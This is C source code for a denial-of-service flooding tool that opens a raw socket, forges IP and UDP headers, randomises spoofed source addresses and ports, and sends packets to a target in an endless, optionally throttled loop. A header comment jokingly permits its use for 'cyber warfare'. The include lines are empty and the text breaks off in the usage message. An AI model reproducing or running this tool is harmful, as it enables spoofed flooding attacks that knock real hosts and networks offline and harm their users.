/* This is released under the GNU GPL License v3.0, and is allowed to be used for cyber warfare. ;) */ #include #include #include #include #include #include #include #include #include #define MAX_PACKET_SIZE 4096 #define PHI 0x9e3779b9 static uint32_t Q[4096], c = 362436; struct thread_data{ int throttle; int thread_id; struct sockaddr_in sin; }; void init_rand(uint32_t x) { int i; Q[0] = x; Q[1] = x + PHI; Q[2] = x + PHI + PHI; for (i = 3; i < 4096; i++) Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; } uint32_t rand_cmwc(void) { uint64_t t, a = 18782LL; static uint32_t i = 4095; uint32_t x, r = 0xfffffffe; i = (i + 1) & 4095; t = a * Q[i] + c; c = (t >> 32); x = t + c; if (x < c) { x++; c++; } return (Q[i] = r - x); } char *myStrCat (char *s, char *a) { while (*s != '\0') s++; while (*a != '\0') *s++ = *a++; *s = '\0'; return s; } char *replStr (char *str, size_t count) { if (count == 0) return NULL; char *ret = malloc (strlen (str) * count + count); if (ret == NULL) return NULL; *ret = '\0'; char *tmp = myStrCat (ret, str); while (--count > 0) { tmp = myStrCat (tmp, str); } return ret; } unsigned short csum (unsigned short *buf, int nwords) { unsigned long sum; for (sum = 0; nwords > 0; nwords--) sum += *buf++; sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); return (unsigned short)(~sum); } void setup_ip_header(struct iphdr *iph) { iph->ihl = 5; iph->version = 4; iph->tos = 0; iph->tot_len = sizeof(struct iphdr) + 1028; iph->id = htonl(54321); iph->frag_off = 0; iph->ttl = MAXTTL; iph->protocol = IPPROTO_UDP; iph->check = 0; iph->saddr = inet_addr("192.168.3.100"); } void setup_udp_header(struct udphdr *udph) { udph->source = htons(5678); udph->check = 0; char *data = (char *)udph + sizeof(struct udphdr); data = replStr("\xFF" "\xFF" "\xFF" "\xFF", 256); udph->len=htons(1028); } void *flood(void *par1) { struct thread_data *td = (struct thread_data *)par1; char datagram[MAX_PACKET_SIZE]; struct iphdr *iph = (struct iphdr *)datagram; struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr); struct sockaddr_in sin = td->sin; char new_ip[sizeof "255.255.255.255"]; int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP); if(s < 0){ fprintf(stderr, "Could not open raw socket.\n"); exit(-1); } memset(datagram, 0, MAX_PACKET_SIZE); setup_ip_header(iph); setup_udp_header(udph); udph->dest = htons (rand() % 20480); iph->daddr = sin.sin_addr.s_addr; iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1); int tmp = 1; const int *val = &tmp; if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){ fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n"); exit(-1); } int throttle = td->throttle; uint32_t random_num; uint32_t ul_dst; init_rand(time(NULL)); if(throttle == 0){ while(1){ sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin)); random_num = rand_cmwc(); ul_dst = (random_num >> 24 & 0xFF) << 24 | (random_num >> 16 & 0xFF) << 16 | (random_num >> 8 & 0xFF) << 8 | (random_num & 0xFF); iph->saddr = ul_dst; udph->source = htons(random_num & 0xFFFF); iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1); } } else { while(1){ throttle = td->throttle; sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin)); random_num = rand_cmwc(); ul_dst = (random_num >> 24 & 0xFF) << 24 | (random_num >> 16 & 0xFF) << 16 | (random_num >> 8 & 0xFF) << 8 | (random_num & 0xFF); iph->saddr = ul_dst; udph->source = htons(random_num & 0xFFFF); iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1); while(--throttle); } } } int main(int argc, char *argv[ ]) { if(argc < 4){ fprintf(stderr, "Invalid parameters!\n"); fprintf(stdout, "Usage: %s